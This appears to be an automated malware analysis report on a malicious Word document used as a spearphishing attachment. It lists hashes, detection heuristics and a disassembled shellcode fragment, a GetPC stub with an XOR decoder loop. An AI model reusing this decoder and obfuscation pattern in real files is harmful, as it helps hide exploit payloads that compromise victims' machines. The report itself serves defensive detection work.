Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0d34392d467ac336…

MALICIOUS

Office (OLE)

69.0 KB Created: 2006-01-25 08:30:00 Authoring application: Microsoft Office Word First seen: 2015-10-01
MD5: d1e87ebd34743264c1edae5f437a66b0 SHA-1: 2bf9670a6cdec9e419e3496c0737af1052031dfe SHA-256: 0d34392d467ac336684da04fb95f8ce0c0fbc323ecdee2c5209ecddf3dfe5476
140 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment

The sample is an Office document containing embedded objects, indicated by the 'OLE_EPRINT_EMF_OBJECT' heuristic. The document body, though in Chinese, appears to be a report about test file construction, potentially a lure to trick users into interacting with the embedded objects. The XOR-encoded strings and GetPC stub suggest obfuscation techniques commonly used by malware. Without further script or URL analysis, the exact payload and family remain unknown.

Heuristics 3

  • Office EPRINT stream contains EMF object high CVE related OLE_EPRINT_EMF_OBJECT
    OLE ObjectPool contains an EPRINT stream with EMF data. This is rare in normal documents and is related Office object-delivery evidence when paired with exploit payload anomalies, but the malformed graphics record required for exact CVE attribution is not proven by this rule alone.
  • XOR-encoded strings (key 0xFF) critical SC_XOR_ENCODED
    Found 3 Windows library/API name(s) XOR-encoded with single-byte key 0xFF: 'CreateProcessA', 'ExitProcess', 'CreateFileA'
    Disassembly hidden — these bytes score as degenerate, not coherent x86 code (single mnemonic 'add' is 89% of instructions — a sled or padding/filler run, not program logic).
  • x86 GetPC stub (CALL $+5; POP EBX) high SC_GETPC_CALL
    x86 GetPC stub (CALL $+5; POP EBX)
    Disassembly
    x86 disassembly · validity: uncertain (0.584) — 5/5 branch targets land on an instruction boundary (100% coherence)
    00000B11  e800000000        call 0xb16
00000B16  5b                pop ebx
00000B17  b9b0020000        mov ecx, 0x2b0
00000B1C  81c31a000000      add ebx, 0x1a
00000B22  8a33              mov dh, byte ptr [ebx]
00000B24  80f6ec            xor dh, 0xec
00000B27  8833              mov byte ptr [ebx], dh
00000B29  43                inc ebx
00000B2A  e2f6              loop 0xb22
00000B2C  eb02              jmp 0xb30
00000B2E  ebe1              jmp 0xb11
00000B30  884ddc            mov byte ptr [ebp - 0x24], cl
00000B33  ec                in al, dx
00000B34  ec                in al, dx
00000B35  ec                in al, dx
00000B36  67ac              lodsb al, byte ptr [si]
00000B38  e067              loopne 0xba1
00000B3A  9c                pushfd
00000B3B  f0                .byte 0xf0
00000B3C  41                inc ecx
00000B3D  679c              pushfd
00000B3F  e405              in al, 5
00000B41  86ee              xchg dh, ch
00000B43  ec                in al, dx
00000B44  ec                in al, dx
00000B45  b46d              mov ah, 0x6d
00000B47  00ec              add ah, ch
00000B49  ee                out dx, al
00000B4A  ec                in al, dx
00000B4B  ec                in al, dx
00000B4C  671067f4          adc byte ptr [bx - 0xc], ah
00000B50  65b3e8            mov bl, 0xe8
00000B53  659b              wait
00000B55  e46f              in al, 0x6f
00000B57  2ce8              sub al, 0xe8
00000B59  65ab              stosd dword ptr es:[edi], eax
00000B5B  e06f              loopne 0xbcc
00000B5D  2ce0              sub al, 0xe0
00000B5F  65ab              stosd dword ptr es:[edi], eax
00000B61  fc                cld
00000B62  6f                outsd dx, dword ptr [esi]
00000B63  2cfe              sub al, 0xfe
00000B65  656b6cececec      imul ebp, dword ptr gs:[esp + ebp*8 - 0x14], -0x14
00000B6B  bb67106d1b        mov ebx, 0x1b6d1067
00000B70  13                .byte 0x13

Open this report in the interactive analyzer, or submit your own file for analysis.